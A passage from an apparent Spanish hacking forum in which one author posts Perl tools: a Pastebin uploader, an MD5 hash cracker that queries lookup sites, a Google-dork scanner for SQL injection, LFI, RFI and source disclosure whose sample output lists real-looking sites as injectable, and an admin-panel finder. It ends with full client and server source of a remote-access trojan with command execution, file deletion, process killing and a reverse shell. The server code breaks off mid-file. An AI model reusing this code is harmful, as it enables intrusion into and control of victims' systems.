print "[3] : Exit\n\n";
print "[Option] : ";
chomp(my $op = <stdin>);

if ($op eq 1) {
print "\n\n[File] : ";
chomp(my $file = <stdin>);

if (-f $file)  {

($name,$exta) =verfile($file);

my $ext = extensiones($exta);

if ($ext ne "Yet") {


$code = openfile($file);

$re = lleva($name,$code,$ext);

print "\n\n[+] File : $file\n";
print "[+] Link : ".$re."\n";

savefile("uploads_paste.txt","\n[+] File : $file");
savefile("uploads_paste.txt","[+] Link : ".$re);

}


} else {
print "\n\n[-] Error\n\n";
}
reload();
}

elsif ($op eq 2) {

print "\n\n[Directory] : ";
chomp(my $dir = <stdin>);

if (-d $dir) {

my @files = verdir($dir);

print "\n\n[+] Loading directory\n";

for my $file(@files) {

chomp $file;

my ($name,$exta) =verfile($file);

my $ext = extensiones($exta);

if ($ext ne "Yet") {

my $code = openfile($dir."/".$file);

$re = lleva($name,$code,$ext);

print "\n\n[+] File : $file\n";
print "[+] Link : ".$re."\n";

savefile("uploads_paste.txt","\n[+] File : $file");
savefile("uploads_paste.txt","[+] Link : ".$re);

}
}
} else {
print "\n\n[-] Error\n\n";
}

reload();
}

elsif ($op eq 3) {
copyright();
<stdin>;
exit(1);
}

else {
menu();
}
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

sub header {

print q(

 PPPP     AA     SSSSTTTTTTEEEE    BBBB   II NN   NN     UU  UU  PPPP 
 PP PP    AA    SS  S  TT  EE      BB BB  II NNN  NN     UU  UU  PP PP
 PP PP   AAAA   SS     TT  EE      BB BB  II NNNN NN     UU  UU  PP PP
 PPPP    A  A    SSS   TT  EEEE    BBBB   II NN N NN     UU  UU  PPPP 
 PP     AAAAAA     SS  TT  EE      BB BB  II NN NNNN     UU  UU  PP   
 PP     AA  AA  S  SS  TT  EE      BB BB  II NN  NNN     UUUUUU  PP   
 PP     AA  AA  SSSS   TT  EEEE    BBBB   II NN   NN      UUUU   PP   


);

}

sub clean {
system("cls");
}



sub verdir{
my @archivos;
opendir DIR,$_[0];
my @archivos = readdir DIR;
for (@archivos) {
if (-f $_[0]."/".$_) {
push(@files,$_)
}
}
return @files;
}

sub verfile {
if ($_[0]=~/(.*)\.(.*)/ig) {
return ($1,$2);
}
}

sub extensiones {

if ($_[0] =~/py/ig) {
$code  = "python";
}
elsif ($_[0] =~/pl/ig) {
$code = "perl";
}
elsif ($_[0] =~/rb/ig) {
$code = "ruby";
}
elsif ($_[0] =~/php/ig) {
$code = "php";
}
elsif ($_[0] =~/txt/ig) {
$code = "";
}
else {
$code = "Yet";
}
return $code;
}

sub reload {
print "\n\n[?] Enter for continue\n\n";
<stdin>;
menu();
}



sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub openfile {
	
my $r;

open (FILE,$_[0]);
@wor = <FILE>;
close FILE;
for(@wor) {
$r.= $_;
}
return $r;
}

sub lleva {
return $nave->post('http://pastebin.com/api_public.php',{ paste_code => $_[1],paste_name=> $_[0],paste_format=>$_[2],paste_expire_date=>'N',paste_private=>"public",submit=>'submit'})->content;
} 

# ¿ The End ?

#337

Perl / [Perl] Pass Cracker By DOddy H

Julio 03, 2011, 09:48:52 PM

Hola , aca les dejo un simple programa para buscar la decodificacion de un hash md5

Código: perl


#!usr/bin/perl
#Pass Cracker 1.0 
#(C) Doddy Hackman 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <hash>\n\n";
} else {
crackit($ARGV[0]);
}
copyright();

sub crackit {

print "\n[+] Cracking $_[0]\n\n";

my %hash = (
   
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},   
'http://md5.hashcracking.com/search.php?md5=' =>  { 
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  { 
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  { 
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  { 
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  { 
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);

for my $data(keys %hash) {

if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
}
}
print "\n[+] Finish\n"; 
}

sub head {
print "\n\n-- == Pass Cracker == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

Ejemplo de uso

Código: text


perl crack.pl <hash>

#338

Perl / [Perl] Paranoic Scan By Doddy H

Julio 03, 2011, 09:48:39 PM

Hola.

Hoy traigo un programa que eh estado haciendo porque estaba arto de ir probando cada
web que encontraba en google para saber si tenia la vulnerabilidad que queria
Asi que por eso hice esta tool , con las siguientes opciones

* Permite scaner un archivo con webs
* Permite buscar en google , borrar repes , y luego scanear

Tipos de scan :

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOURE

Ejemplo de uso

Código: perl





@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
 @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
 @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
 @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
 @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
 @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




[a] : Scan a File
[b] : Search in google and scan the webs

[option] : b

[+] Dork : ficha.php+id
[+] Pages : 200


[+] Scan Type :

[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All


[Option] : s

[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200

[+] Searching pages..
[+] Cleaning results

[Status] : Scanning
[Webs Count] : 136

[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=

[Status] : Finish



(C) Doddy Hackman 2010

Codigo

Código: perl


#!usr/bin/perl
#Paranoic Scan 0.4
#(c)0ded by Doddy H 2010

use LWP::UserAgent;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");





sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
 @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @ 
 @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @ 
 @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @ 
 @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @ 
 @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@ 
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @ 




);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op=~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
@paginas = repes(savewords($word));
my $option = &men;
scan($option,@paginas);
} 
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
@paginas = &google("www.google.com.ar",$dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
&sql($_);
} 
if ($option=~/L/ig) {
&lfi($_);
}
if ($option=~/R/ig) {
&rfi($_);
}
if ($option=~/F/ig) {
&fsd($_);
}
if ($option=~/A/ig) {
&sql($_);
&lfi($_);
&rfi($_);
&fsd($_)
}
}
}
print "\n[Status] : Finish\n";
&finish;
	 

sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub google {
print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Cleaning results\n";
for(@founds) {
$t = clean($_);
push(@r,$t);
} 	
return(repes(@r));
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}


sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub savewords {
open (FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
$t = clean($_);
push(@r,$t);
} 	
return(@r);
} 

sub men {
print "\n\n[+] Scan Type : \n\n";
print "[S] : SQL\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[A] : All\n\n";
print "\n[Option] : ";
chomp(my $option = <STDIN>);
return $option;
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

#The End
#Contact : doddy-hackman[at]hotmail[com]
#blog : doddy-hackman.blogspot.com

#339

Perl / [Perl] Panel Control 0.6

Julio 03, 2011, 09:48:11 PM

La nueva version de esta herramienta para buscar
el panel de administracion

Código: perl


#!usr/bin/perl
#Panel Control 0.6
#(C) Doddy Hackman 2011

use LWP::UserAgent;

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {
print "\n[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = toma($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
}
}
}

sub head {
print "\n\n-- == Panel Control == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0]);
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

#340

Perl / [Perl] Nefaster

Julio 03, 2011, 09:47:59 PM

Bueno es es mi troyano Nefaster , en esta version le arregle varias cosas que pasare a detallar

Mostrar Informacion
Navegador de archivos
Cambiar directorio de navegacion
Crear archivo
Borrar archivo
Borrar directorio
Reproducir musica o videos poniendo la ruta en la opcion
Parar reproduccion
Abrir lectora de CD
Cerrar lectora de CD
Puertos abiertos
Mensaje
Ejecutar comandos
Esconder barra de tareas
Devolver barra de tareas
Esconder iconos del escritorio
Devolver iconos del escritorio
Administrar procesos con posibilidad de cerrar el que quieran

Reverse Shell si es que quieren ejecutar comandos de forma mas comoda

El codigo del cliente es este

Código: perl


#!usr/bin/perl
#Nefester (Cliente) 0.1 By Doddy H


use IO::Socket;
use Cwd;

&menu;

sub head {

system 'cls';

print q(


            E      F                   TT    E        
NNNNNNNEEEEEE FFFFFF   AAA   SSSSSTTTTTTEEEEEE RRRRRR 
 NN NN  E EE   FFFF   A AA  S  S T TT T  E EE   RRRRR 
 NNNNN  E EE   FF F   AAAAA S     T TT   E EE   RR  R 
 NNNNN EEEEE  FFFFF  AAA AA  SSS S  TT  EEEEE  RRRRR  
 NNNNN  E EEE  FFF    AAAAA S  SSS  TT   E EEE  RR R  
 NN NN  EEEE E FF    AAA AA SS  SS  TT   EEEE E RR  R 
NNN NN EEEEEEEFFFF  AAA  AAA  SSS  TTTT EEEEEEE RRR RR
                            SS                 R   R  



);

}

sub menu {

&head;

print "[Target] : ";
chomp(my $ip = <STDIN>);



my $socket = new IO::Socket::INET( 
PeerAddr => $ip,
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

if ($socket) {
$socket->close;
&menuo($ip);
} else {
print "\n\n[-] Target no infectado\n";
<STDIN>;
&menu; 
}

}

sub menuo {

&head;

print "[$_[0]] : Servidor Activado\n\n";
print q(
1 : Informacion
2 : Navegador
3 : Abrir CD
4 : Cerrar CD
5 : Puertos abiertos
6 : Mensaje
7 : CMD
8 : Esconder barra de tareas
9 : Devolver barra de tareas
10 : Esconder iconos
11 : Devolver iconos
12 : Administrar procesos
13 : Reverse Shell
14 : Cambiar IP
15 : Salir


);
print "[Opcion] : ";
chomp(my $opcion = <STDIN>);


if ($opcion eq 1) {
print "\n\n[+] Informacion\n\n";
$re = daryrecibir($_[0],"infor");
if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) {
print "[Dominio] : $1\n";
print "[Chip] : $2\n";	
print "[Version] : $3\n";	
print "[Nombre] : $4\n";	
print "[OS] : $5\n";
<stdin>;
} 
&menuo($_[0]);
} 
elsif ($opcion eq 2) {

menu1:
print "\n\n[+] Navegacion de archivos\n\n";
$cwd = daryrecibir($_[0],"getcwd"."\r\n");
print "tengo $cwd\n";
show($_[0],"/");
&menu2;

sub menu2 {
print "\n\n[Opciones]\n\n";
print "1 - Cambiar directorio\n";
print "2 - Crear archivo\n";
print "3 - Borrar archivo\n";
print "4 - Borrar directorio\n";
print "5 - Reproducir musica\n";
print "6 - Parar reproduccion\n";
print "7 - Volver al menu inicial\n\n";
print "[Opcion] : ";
chomp(my $op = <stdin>);

if ($op eq 1) {
print "\n\n[+] Directorio : ";
chomp (my $dir=<stdin>);
$ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA");
if ($ver=~/ok/ig) {
print "\n\n[+] Directory changed\n\n";
}
show($_[0],$dir);
&menu2;
<stdin>;
}

elsif ($op eq 2) {

print "\n\n[Nombre] : ";
chomp(my $name = <stdin>);
print "\n\n[Contenido] : ";
chomp(my $code = <stdin>);

daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY");

print "\n\n[+] Archivo creado \n\n";
<stdin>;
}
elsif ($op eq 3) {
print "\n\n[Archivo a borrar] : ";
chomp(my $file = <stdin>);
$re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA");
if ($re=~/ok/) {
print "\n\n[+] Archivo Borrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
}

elsif ($op eq 4) {
print "\n\n[Directorio a borrar] : ";
chomp(my $file = <stdin>);
$re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA");
if ($re=~/ok/) {
print "\n\n[+] Directorio Borrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
}

elsif ($op eq 5) {
print "\n\n[Archivo] : ";
chomp(my $file = <stdin>);
print "\n\n[+] Reproduciendo\n\n";
daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA");
<stdin>;
}
elsif ($op eq 6) {
print "\n\n[+] Reproduccion detenida\n\n";
daryrecibir($_[0],"pararmusic");
<stdin>;
}
elsif ($op eq 7) {
&menuo($_[0]);
}
else {
show($_[0],"/");
}
goto menu1;
}
}

elsif ($opcion eq 3) {
daryrecibir($_[0],"opencd");
&menuo($_[0]);
}

elsif ($opcion eq 4) {
daryrecibir($_[0],"closedcd");
&menuo($_[0]);
}

elsif ($opcion eq 5) {
print "\n[Puertos Abiertos]\n\n";
$re = daryrecibir($_[0],"porters");
while ($re=~/:(.*?):/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}
<stdin>;
&menuo($_[0]);
}
elsif ($opcion eq 6) {
print "\n[Mensaje] : ";
chomp (my $msg = <stdin>);
daryrecibir($_[0],"msgbox $msg");
<stdin>;
&menuo($_[0]);
} 
elsif ($opcion eq 7) {

menu:

my $cmd,$re;

print "\n\n>";

chomp(my $cmd= <stdin>);

if ($cmd=~/exit/ig) {
&menuo($_[0]);
}

$re = daryrecibir($_[0],"comando :$cmd:");
print "\n".$re;
goto menu;
&menuo($_[0]);
}
elsif ($opcion eq 8) {
daryrecibir($_[0],"iniciochau");
&menuo($_[0]);
}
elsif ($opcion eq 9) {
daryrecibir($_[0],"iniciovuelve");
&menuo($_[0]);
}
elsif ($opcion eq 10) {
daryrecibir($_[0],"iconochau");
&menuo($_[0]);
}
elsif ($opcion eq 11) {
daryrecibir($_[0],"iconovuelve");
&menuo($_[0]);
}

elsif ($opcion eq 12) {

&reload($_[0]);

sub reload {

my @pro;
my @pids;

my $sockex = new IO::Socket::INET( 
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

print $sockex "mostrarpro"."\r\n";
$sockex->read($re,5000);
$sockex->close;

chomp $re;

print "\n\n[+] Procesos encontrados\n\n";

while ($re=~/PROXEC(.*?)PROXEC/ig) {
if ($1 ne "") {
push(@pro,$1);
}
}

while ($re=~/PIDX(.*?)PIDX/ig) {
if ($1 ne "") {
push(@pids,$1);
}
}

$cantidad = int(@pro);

for my $num(1..$cantidad) {
if ($pro[$num] ne "") {
print "\n[+] Proceso : ".$pro[$num]."\n";
print "[+] PIDS : ".$pids[$num]."\n"; 
}
}

print q(

[Opciones]


1 - Refrescar lista
2 - Cerrar procesos
3 - Volver al menu
 
);

print "\n[Opcion] :  ";
chomp(my $opc = <stdin>);

if ($opc=~/1/ig) {
&reload($_[0]);
}
elsif($opc=~/2/ig) {
print "\n[+] Write the name of the process : ";
chomp(my $numb = <stdin>);
print "\n[+] Write the PID of the process : ";
chomp(my $pid = <stdin>);
$re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA");
if ($re=~/ok/ig) {
print "\n\n[+] Proceso cerrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
&reload($_[0]);
}
elsif($opc=~/3/ig) {
&menuo($_[0]);
}
else {
&reload;
}
}
}

elsif ($opcion eq 13) {
print "\n\n[IP] : ";
chomp(my $ip = <stdin>);
print "\n\n[Port] : ";
chomp(my $port = <stdin>);
print "\n\n[+] Connected !!!\n\n";
$re = daryrecibir($_[0],"backshell :$ip:$port:");
}
elsif ($opcion eq 14) {
&menu;
}
elsif ($opcion eq 15) {
exit 1;
}	
else {
&menuo;
}
}

sub daryrecibir {

my $sockex = new IO::Socket::INET( 
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

print $sockex $_[1]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r";
}

sub show {

my $re = daryrecibir($_[0],"getcwd"."\r\n");
print "\n\n[+] Directorio Actual : $re\n\n";
$re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n");
print "\n\n[Directorios]\n\n";

while ($re1=~/DIREX(.*?)DIREX/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}
	
print "\n\n[Archivos]\n\n";

while ($re1=~/FILEX(.*?)FILEX/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}

}

#
# ¿ The End ? 
#

Y el server

Código: perl



#!/usr/bin/perl
#Nefester (sERVidor) 0.1 By Doddy H
#Compilar con perl2exe para sacar consola

use IO::Socket;
use Socket;
use Win32;
use Cwd;
use Win32::MediaPlayer;
use Win32::Process::List;
use Win32::Process;
use Win32::API;

use constant SW_HIDE => 0;
use constant SW_SHOWNORMAL => 1;

my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N');
my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N');

$test = new Win32::MediaPlayer;

my $sock = IO::Socket::INET->new(LocalPort => 666,
Listen => 10,
Proto => 'tcp',
Reuse => 1); 

print "online\n";

while (my $con = $sock->accept){
$resultado = <$con>;
print "boludo mando : $resultado\n";

if ($resultado=~/msgbox (.*)/ig) {
Win32::MsgBox($1,0,"Mensaje de Dios") 
}

if ($resultado=~/backshell :(.*):(.*):/ig) {

my ($ip,$port) = ($1,$2);

print "conectando $ip con $port\n";

$ip =~s/(\s)+$//;
$port =~s/(\s)+$//;

conectar($ip,$port);
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}


}

if ($resultado =~/opencd/ig) {

use Win32::API;

my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
my $rta = ' ' x 127;  
$ventana->Call('set CDAudio door open', $rta, 127, 0);
print $con "ok"."\r\n";	
}

if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) {

my ($pid,$numb) = ($1,$2);

$pid=~s/(\s)+$//;
$numb=~s/(\s)+$//;

if (Win32::Process::KillProcess($pid,$numb)) {
print $con "ok\r\n";
}
}

if ($resultado =~/closedcd/ig) {

use Win32::API;

my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
my $rta = ' ' x 127;  
$ventana->Call('set CDAudio door closed', $rta, 127, 0);
print $con "ok"."\r\n";	
}

if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) {

my $filex = $1;

$filex =~s/(\s)+$//;

print getcwd()."/".$filex."\n\n";

if (unlink(getcwd()."/".$filex)) {
print $con "ok\r\n"; 
}

}



if ($resultado=~/infor/ig) {
print "mando";	
use Win32;


my $domain = Win32::DomainName();
my $chip = Win32::GetChipName();
my $version = Win32::GetOSVersion();
my $nombre = Win32::LoginName();
my  $os = Win32::GetOSName();

print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n";
}


if ($resultado=~/porters/ig) {

use Net::Netstat::Wrapper;

$por = "";
@ports = Net::Netstat::Wrapper->only_port();
for(@ports) {
$por = $por.":".$_;
}
print $con $por."\r\n";
}


if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) {

my $cancion = $1;

$cancion =~s/(\s)+$//;

$test->load($cancion);
$test->play;	

}

